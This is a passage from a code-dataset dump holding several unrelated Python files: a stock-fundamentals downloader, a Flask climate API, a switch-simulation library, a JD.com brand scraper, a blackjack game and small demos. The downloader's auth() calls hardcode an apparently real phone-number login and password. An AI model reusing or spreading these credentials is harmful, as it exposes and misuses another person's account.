indicator.eps).filter(indicator.code.in_(stock_reg))\r\n logout()\r\n return q\r\n\r\n\r\ndef one_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data0 = get_fundamentals(q, statDate='2009q4').T\r\n col = list(data0.iloc[0, :])\r\n data0 = DataFrame(DataFrame(data0.iloc[1:, :]))\r\n data0.columns = col\r\n data0_csv = data0.to_csv('2009年第四季度每日收益+日期.csv')\r\n\r\n data1 = get_fundamentals(q, statDate='2010q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2010年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2010q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2010年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2010q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2010年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2010q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2010年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef two_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2011q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2011年第一季度每日收益+���期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2011q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2011年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2011q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2011年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2011q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2011年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef three_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2012q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2012年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2012q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2012年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2012q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2012年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2012q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2012年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef four_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2013q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2013年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2013q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2013年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2013q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2013年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2013q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2013年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef five_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2014q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2014年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2014q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2014年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2014q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2014年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2014q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2014年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef six_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2015q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2015年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2015q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2015年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2015q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2015年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2015q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2015年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef seven_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2016q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2016年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2016q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2016年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2016q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2016年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2016q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2016年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef eight_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2017q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2017年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2017q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2017年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2017q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2017年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2017q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2017年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef nine_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2018q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2018年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2018q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2018年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2018q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2018年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2018q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2018年第四季度每日收益+日期.csv')\r\n\r\n logout()\r\n\r\n\r\ndef concat_data():\r\n data2009q4 = pd.read_csv('2009年第四季度每日收益+日期.csv', index_col=0)\r\n data2010q1 = pd.read_csv('2010年第一季度每日收益+日期.csv', index_col=0)\r\n data2010q2 = pd.read_csv('2010年第二季度每日收益+日期.csv', index_col=0)\r\n data2010q3 = pd.read_csv('2010年第三季度每日收益+日期.csv', index_col=0)\r\n data2010q4 = pd.read_csv('2010年第四季度每日收益+日期.csv', index_col=0)\r\n data2011q1 = pd.read_csv('2011年第一季度每日收益+日期.csv', index_col=0)\r\n data2011q2 = pd.read_csv('2011年第二季度每日收益+日期.csv', index_col=0)\r\n data2011q3 = pd.read_csv('2011年第三季度每日收益+日期.csv', index_col=0)\r\n data2011q4 = pd.read_csv('2011年第四季度每日收益+日期.csv', index_col=0)\r\n data2012q1 = pd.read_csv('2012年第一季度每日收益+日期.csv', index_col=0)\r\n data2012q2 = pd.read_csv('2012年第二季度每日收益+日期.csv', index_col=0)\r\n data2012q3 = pd.read_csv('2012年第三季度每日收益+日期.csv', index_col=0)\r\n data2012q4 = pd.read_csv('2012年第四季度每日收益+日期.csv', index_col=0)\r\n data2013q1 = pd.read_csv('2013年第一季度每日收益+日期.csv', index_col=0)\r\n data2013q2 = pd.read_csv('2013年第二季度每日收益+日期.csv', index_col=0)\r\n data2013q3 = pd.read_csv('2013年第三季度每日收益+日期.csv', index_col=0)\r\n data2013q4 = pd.read_csv('2013年第四季度每日收益+日期.csv', index_col=0)\r\n data2014q1 = pd.read_csv('2014年第一季度每日收益+日期.csv', index_col=0)\r\n data2014q2 = pd.read_csv('2014年第二季度每日收益+日期.csv', index_col=0)\r\n data2014q3 = pd.read_csv('2014年第三季度每日收益+日期.csv', index_col=0)\r\n data2014q4 = pd.read_csv('2014年第四季度每日收益+日期.csv', index_col=0)\r\n data2015q1 = pd.read_csv('2015年第一季度每日收益+日期.csv', index_col=0)\r\n data2015q2 = pd.read_csv('2015年第二季度每日收益+日期.csv', index_col=0)\r\n data2015q3 = pd.read_csv('2015年第三季度每日收益+日期.csv', index_col=0)\r\n data2015q4 = pd.read_csv('2015年第四季度每日收益+日期.csv', index_col=0)\r\n data2016q1 = pd.read_csv('2016年第一季度每日收益+日期.csv', index_col=0)\r\n data2016q2 = pd.read_csv('2016年第二季度每日收益+日期.csv', index_col=0)\r\n data2016q3 = pd.read_csv('2016年第三季度每日收益+日期.csv', index_col=0)\r\n data2016q4 = pd.read_csv('2016年第四季度每日收益+日期.csv', index_col=0)\r\n data2017q1 = pd.read_csv('2017年第一季度每日收益+日期.csv', index_col=0)\r\n data2017q2 = pd.read_csv('2017年第二季度每日收益+日期.csv', index_col=0)\r\n data2017q3 = pd.read_csv('2017年第三季度每日收益+日期.csv', index_col=0)\r\n data2017q4 = pd.read_csv('2017年第四季度每日收益+日期.csv', index_col=0)\r\n data2018q1 = pd.read_csv('2018年第一季度每日收益+日期.csv', index_col=0)\r\n data2018q2 = pd.read_csv('2018年第二季度每日收益+日期.csv', index_col=0)\r\n data2018q3 = pd.read_csv('2018年第三季度每日收益+日期.csv', index_col=0)\r\n data2018q4 = pd.read_csv('2018年第四季度每日收益+日期.csv', index_col=0)\r\n data = pd.concat([data2009q4, data2010q1, data2010q2, data2010q3, data2010q4,\r\n data2011q1, data2011q2, data2011q3, data2011q4,\r\n data2012q1, data2012q2, data2012q3, data2012q4,\r\n data2013q1, data2013q2, data2013q3, data2013q4,\r\n data2014q1, data2014q2, data2014q3, data2014q4,\r\n data2015q1, data2015q2, data2015q3, data2015q4,\r\n data2016q1, data2016q2, data2016q3, data2016q4,\r\n data2017q1, data2017q2, data2017q3, data2017q4,\r\n data2018q1, data2018q2, data2018q3, data2018q4,], ignore_index=True)\r\n data = DataFrame(data.iloc[:, :-1])\r\n # data_csv = data.to_csv('2010-2018data.csv')\r\n return data\r\n\r\n\r\ndef f(data):\r\n \"\"\"\r\n 财务数据填充\r\n :param data: 数组\r\n :return:\r\n \"\"\"\r\n data_time = data[0:-1:2] # 数组间隔切片,选出所有的日期\r\n data_data = data[1::2] # 选出所有的财务指标\r\n # 处理财务指标的缺失值,后向填充\r\n data_time = data_time.fillna(method='bfill')\r\n data_time = data_time.fillna(method='ffill')\r\n data_data = data_data.fillna(method='bfill')\r\n data_data = data_data.fillna(method='ffill')\r\n data_col = []\r\n row_num = len(data)/2\r\n data_data.index = np.arange(row_num)\r\n data_time.index = np.arange(row_num)\r\n for i in range(int(row_num)):\r\n if i == 0:\r\n if data_time[i] >= '2018-12-31':\r\n n = len(pd.date_range(start='2010-01-01', end='2018-12-31', freq='B'))\r\n for m in range(n):\r\n data_col.append(data_data[i])\r\n break\r\n else:\r\n n = len(pd.date_range(start='2010-01-01', end=data_time[i], freq='B'))\r\n for m in range(n):\r\n data_col.append(data_data[i])\r\n\r\n else:\r\n if data_time[i] >= '2018-12-31':\r\n n = len(pd.date_range(start=data_time[i - 1], end='2018-12-31', freq='B'))\r\n for m in range(n - 1):\r\n data_col.append(data_data[i])\r\n break\r\n elif data_time[i] == data_time[i-1]:\r\n n = 0\r\n else:\r\n n = len(pd.date_range(start=data_time[i-1], end=data_time[i], freq='B'))\r\n for m in range(n-1):\r\n data_col.append(data_data[i])\r\n data = pd.Series(data_col)\r\n return data\r\n\r\n\r\ndef process_data(data):\r\n # 财务数据合并\r\n\r\n # 对每支股票进行填充\r\n new_data = data.apply(f, axis=0)\r\n # 输出结果\r\n new_data.index = pd.date_range(start='2010-01-01', end='2018-12-31', freq='B')\r\n new_data.columns = data.columns\r\n # print(new_data)\r\n new_data_csv = new_data.to_csv('2010-2018的净利润+日期.csv')\r\n\r\n\r\ndef main():\r\n # 确定查询字段\r\n q = get_eps()\r\n # 获取10-18年的数据\r\n one_data(q)\r\n two_data(q)\r\n three_data(q)\r\n four_data(q)\r\n five_data(q)\r\n six_data(q)\r\n seven_data(q)\r\n eight_data(q)\r\n nine_data(q)\r\n # 数据合并\r\n data = concat_data()\r\n process_data(data) # 修改文件名\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"季度财务数据.py","file_name":"季度财务数据.py","file_ext":"py","file_size_in_byte":17013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"91470827","text":"'''\nWelcome back! Let's create an accessible API of our climate data from our \nquery in SQL Alchemy using Flask. \n\nWe will use SQL Alchemy and ORM to read our data, and create available\nroutes in Flask, where each function returns an API in JSON format \nfrom a specific query.\n\nAs a result, we will have the following available routes: \n- homepage\n- precipitation data of the previous 12 months \n- temperature data of the previous 12 months \n- list of stations\n- calculated tmin, tavg, tmax from a range of the start date to the most \nrecent record\n- calculated tmin, tavg, tmax between a specified start and end date\n\n'''\n\n# import dependencies \nfrom flask import Flask, jsonify\nimport json\nimport pandas as pd \nimport numpy as np\n\n# Python SQL toolkit and Object Relational Mapper\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n# initialize SQL Alchemy, sqlite database, and Base \nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n# initialize classes using Base\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\nsession = Session(engine)\n\napp = Flask(__name__) \n\n# function to calculate tavg, tmin, tmax for start and end date\ndef calc_temps(start_date, end_date):\n return session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start_date).filter(Measurement.date <= end_date).all()\n\n# homepage with list of available routes\n@app.route(\"/\")\ndef home():\n return(\n \"

Welcome to the Climate Data API


\"\n \"Available routes:
\"\n \"/api/v1.0/precipitation
\"\n \"/api/v1.0/stations
\"\n \"/api/v1.0/tobs\"\n )\n\n# precipitation API that lists date and precipitation in JSON\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n\n # query to find date and precipitation data from previous year, after 2016-08-18\n results = session.query(Measurement.date, Measurement.prcp).\\\n filter(Measurement.date >= \"2016-8-18\").\\\n order_by(Measurement.date).all()\n \n # create list comprehension for date, precipitation \n precipitation_date = [result[0] for result in results]\n precipitation_data = [result[1] for result in results]\n\n # place data in pd.DataFrame \n precipitation_df = pd.DataFrame({\n \"Date\": precipitation_date, \n \"Precipitation\": precipitation_data})\n\n # load dataframe as JSON \n precipitation_df = json.loads(precipitation_df.to_json(orient='records'))\n\n # return dictionary with key containing each date, precipitation data in JSON \n return jsonify(precipitation_df)\n\n\n# station API that lists all stations from CSV file in JSON\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n results = session.query(Station.id, Station.station, Station.name).all()\n all_stations = list(np.ravel(results))\n return jsonify(all_stations)\n \n # below is an alternative code that also works, where we use Pandas to\n # read the CSV file and reformat into JSON \n \n # df = pd.read_csv(\"Resources/hawaii_stations.csv\")\n # df = json.loads(df.to_json(orient='records'))\n # return jsonify(df)\n\n# temperature API that lists date and temperature in JSON\n@app.route(\"/api/v1.0/tobs\")\ndef temp():\n\n # query to find date and temperature data from previous year, after 2016-08-18\n results = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date >= \"2016-8-18\").\\\n order_by(Measurement.date).all()\n\n # create list comprehension for date, temperature\n temp_date = [result[0] for result in results]\n temp_data = [result[1] for result in results]\n\n # place data in pd.DataFrame \n temp_df = pd.DataFrame({\n \"Date\": temp_date, \n \"Temperature\": temp_data})\n\n # load dataframe as JSON \n temp_df = json.loads(temp_df.to_json(orient='records'))\n\n # return dictionary with key containing each date, temperature data in JSON \n return jsonify(temp_df)\n\n# API to calculate tmin, tmax, tavg from START DATE \n@app.route(\"/api/v1.0/\")\ndef start_calculations(start):\n\n # create a query to list all dates from Measurement\n dates = session.query(Measurement.date)\n date_list =[date[0] for date in dates]\n\n # check if start date in date_list \n if start in date_list:\n\n # perform calculation using query \n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).all()\n\n # create empty list to store results\n result_calculations = []\n\n # create dictionary for results\n for n, a, m in results:\n calucation_start = {}\n calucation_start[\"Minimum Temperature\"] = n\n calucation_start[\"Avg Temperature\"] = a\n calucation_start[\"Max Temperature\"] = m\n result_calculations.append(calucation_start)\n \n # return results in JSON\n return jsonify(result_calculations)\n\n # return error message if start date not in dates database\n else:\n return jsonify({\"error\": f\"Start Date on {start} not found.\"}), 404\n\n# API to calculate tmin, tmax, tavg from a range of START DATE and END DATE\n@app.route(\"/api/v1.0//\")\ndef start_end_calculations(start, end):\n\n # create a query to list all dates from Measurement\n dates = session.query(Measurement.date)\n date_list =[date[0] for date in dates]\n\n # check if start and end date in date_list \n if start in date_list and end in date_list:\n\n # perform calculation \n results = calc_temps(start, end)\n\n # create empty list to store results\n final_calculations = []\n\n # create dictionary for results\n for n, a, m in results:\n calucation_dict = {}\n calucation_dict[\"Minimum Temperature\"] = n\n calucation_dict[\"Avg Temperature\"] = a\n calucation_dict[\"Max Temperature\"] = m\n final_calculations.append(calucation_dict)\n\n # return results in JSON\n return jsonify(final_calculations)\n \n # return error message if start date or end date not in dates database\n else: \n return jsonify({\"error\": f\"Start Date on {start} or End Date {end} not found.\"}), 404 \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"614052207","text":"\nclass Library:\n switches = {}\n port_mapping = {}\n switch_mapping = {}\n root_switch = None\n commands = []\n\n @staticmethod\n def cleanTest():\n Library.switches = {}\n Library.port_mapping = {}\n Library.switch_mapping = {}\n Library.root_switch = None\n Library.commands = []\n\n @staticmethod\n def send(sender_mac, sender_port, frame):\n Library.commands.append(str(format(sender_mac, '02x')) + str(format(sender_port, '02x')) + \"-\" + frame)\n\n if sender_mac in Library.port_mapping:\n if Library.port_mapping.get(sender_mac) is None:\n return\n\n switch_id = Library.port_mapping.get(sender_mac).get(sender_port)\n if (Library.switch_mapping.get(switch_id) is None) or (Library.switches.get(switch_id) is None):\n return\n receivingport = Library.switch_mapping.get(switch_id).get(sender_mac)\n Library.switches.get(switch_id).receive(receivingport, frame)\n else:\n print(\"Sender MAC doesn't exist\")\n\n @staticmethod\n def init_test():\n Library.switches.get(Library.root_switch).receive(-1, \"010000FFFF0000\")\n Library.commands = []\n\n @staticmethod\n def get_calls():\n return Library.commands\n\n @staticmethod\n def add_switch(switch, mac_root, mac_switch):\n Library.root_switch = mac_root\n Library.switches[mac_switch] = switch\n\n @staticmethod\n def add_connection(sw1, port1, sw2, port2):\n if sw1 not in Library.port_mapping:\n Library.port_mapping[sw1] = {}\n\n if sw2 not in Library.port_mapping:\n Library.port_mapping[sw2] = {}\n\n Library.port_mapping[sw1][port1] = sw2\n Library.port_mapping[sw2][port2] = sw1\n\n if sw1 not in Library.switch_mapping:\n Library.switch_mapping[sw1] = {}\n\n if sw2 not in Library.switch_mapping:\n Library.switch_mapping[sw2] = {}\n\n Library.switch_mapping[sw1][sw2] = port1\n Library.switch_mapping[sw2][sw1] = port2","sub_path":"Assignment 2/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"364783566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 25 16:19:20 2017\n爬取品牌\n1.根据category_level3_id\n2.https://list.jd.com/list.html?cat=三级类别编码&trans=1&md=1&my=list_brand\n3.没有禁爬\n\"\"\"\n\nimport requests\nimport json\nimport datetime\n\n#下载网页,若失败返回空文本\ndef load(category_level3_id):\n url = 'https://list.jd.com/list.html'\n params = {'cat' : category_level3_id,\n 'trans' : 1,\n 'md' : 1,\n 'my' : 'list_brand'}\n try:\n response = requests.get(url, params=params)\n txt = response.text\n except:\n print('error: get_brand.load: %s' % category_level3_id)\n txt = ''\n return txt\n \n#解析网页,返回品牌列表,若失败返回空\ndef parse(txt):\n brands_list = []\n try:\n txt_dict = json.loads(txt)\n catalog_level1_name = txt_dict['summary']['cate_infos']['cat1_name']\n catalog_level2_name = txt_dict['summary']['cate_infos']['cat2_name']\n catalog_level3_name = txt_dict['summary']['cate_infos']['cat3_name']\n brands = txt_dict['brands']\n now = datetime.datetime.now()\n crawl_time = now.strftime('%Y-%m-%d %H:%M:%S')\n if brands is not None:\n for brand in brands:\n brand_id = str(brand['id'])\n brand_name = brand['name']\n brand_record = [catalog_level3_name, catalog_level2_name,\n catalog_level1_name, brand_id, brand_name, crawl_time]\n brands_list.append(brand_record)\n else:\n brands_list = [] \n except:\n brands_list = []\n print('error: get_brand.parse')\n return brands_list\n \n\n\n","sub_path":"brand/get_brand.py","file_name":"get_brand.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"13019022","text":"#Bagaimana cara mengukur waktu eksekusi dari sebuah Script Python\n\n#Gunakan script dibawah ini untuk mengukur waktu eksekusi\n\"\"\"\"\n#==========================================\n\nimport time\n\nstart = time.time()\n\n#tulislah code program anda disini\n\nend = time.time()\n\nexecution_time = end - start\n\nprint (\"Execution Time: %s second\" %execution_time)\n\n#============================================\n\"\"\"\n\n\n#Contoh penggunaan script untuk menghitung deret fibonacci\n\nimport time\nstart = time.time()\n#Menulis program untuk deret fibonacci\n#tentukan jumlah deret fibonacci\nAngka = 100\n# tentukan angka pertama\nn1 = 0\n# tentukan angka kedua\nn2 = 1\n# jumlah angka yang dihitung\ncount = 2\n# periksa angka\nif Angka <= 0:\n print(\"Angka harus di atas 0\")\nelif Angka == 1:\n print(\"Deret fibonacci : \",Angka,\":\")\n print(n1)\nelse:\n print(\"Deret fibonacci : \",Angka,\":\")\n print(n1,\",\",n2,end=', ')\n while count < Angka:\n nth = n1 + n2\n print(nth,end=' , ')\n # tukar nilai untuk mendapatkan 2 index terakhir\n n1 = n2\n n2 = nth\n count += 1\n\nend = time.time()\n\nexecution_time = end - start\n\nprint (\"Execution Time: %.10s second\" %execution_time)","sub_path":"execution_time.py","file_name":"execution_time.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"204626132","text":"from random import shuffle\n\nclass Card(object):\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def card_v(self):\n if self.rank in \"TJQK\":\n return 10\n else:\n return \" A23456789\".index(self.rank)\n\n def get_rank(self):\n return self.rank\n\n def __str__(self):\n return \"%s%s\" % (self.rank, self.suit)\n\n\nclass Hand(object):\n def __init__(self, name):\n self.name = name\n self.cards = []\n\n def add_card(self, card):\n self.cards.append(card)\n\n def get_v(self):\n result = 0\n aces = 0\n for card in self.cards:\n result += card.card_v()\n if card.get_rank() == \"A\":\n aces += 1\n\n if result + aces * 10 <= 21:\n result += aces * 10\n return result\n\n def __str__(self):\n text = \"%s's contains:\\n\" % self.name\n for card in self.cards:\n text += str(card) + \" \"\n text += \"\\nHand Value: \" + str(self.get_v())\n return text\n\n\nclass Deck(object):\n def __init__(self):\n ranks = \"23456789TJQKA\"\n suits = \"DCHS\"\n self.cards = [Card(r, s) for r in ranks for s in suits]\n shuffle(self.cards)\n\n def deal_cards(self):\n return self.cards.pop()\n\n\ndef new_game(money):\n d = Deck()\n player_hand = Hand('Player')\n dealer_hand = Hand('Dealer')\n player_hand.add_card(d.deal_cards())\n player_hand.add_card(d.deal_cards())\n dealer_hand.add_card(d.deal_cards())\n print(dealer_hand)\n print(\"=\"*20)\n print(player_hand)\n in_game = True\n while player_hand.get_v() < 21:\n ans = input(\"Hit or stand? (h/s) \\n\")\n if ans == 'h':\n player_hand.add_card(d.deal_cards())\n print(player_hand)\n if player_hand.get_v()>21:\n print(\"You Loose\")\n money -=5\n in_game = False\n break\n elif ans=='s':\n print(\"You stand\")\n break\n else:\n print(\"Error\")\n print('='*20)\n if in_game:\n while dealer_hand.get_v() < 17:\n dealer_hand.add_card(d.deal_cards())\n print(dealer_hand)\n if dealer_hand.get_v() > 21:\n print(\"Dealer bust\")\n money+=5\n in_game = False\n if in_game:\n if player_hand.get_v()>dealer_hand.get_v():\n print(\"You win\")\n money+=5\n else:\n print(\"Dealer win\")\n money-=5\n return money\n\n\nif __name__ == '__main__':\n money = int(input())\n print(\"You have %d$\" % money)\n while money>0:\n money = new_game(money)\n print(\"You have %d$\\n\" % money)\n print(\"\\nYou spent all your money!\")\n\n\n\n","sub_path":"Адаптивный тренажер Python/Black_Jack.py","file_name":"Black_Jack.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"230952101","text":"import logging\nimport time\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\n\nfrom django.conf import settings\nfrom django.db import transaction\nfrom django_filters import rest_framework as filters\nfrom rest_framework import mixins, viewsets, generics\nfrom rest_framework import status, exceptions\nfrom 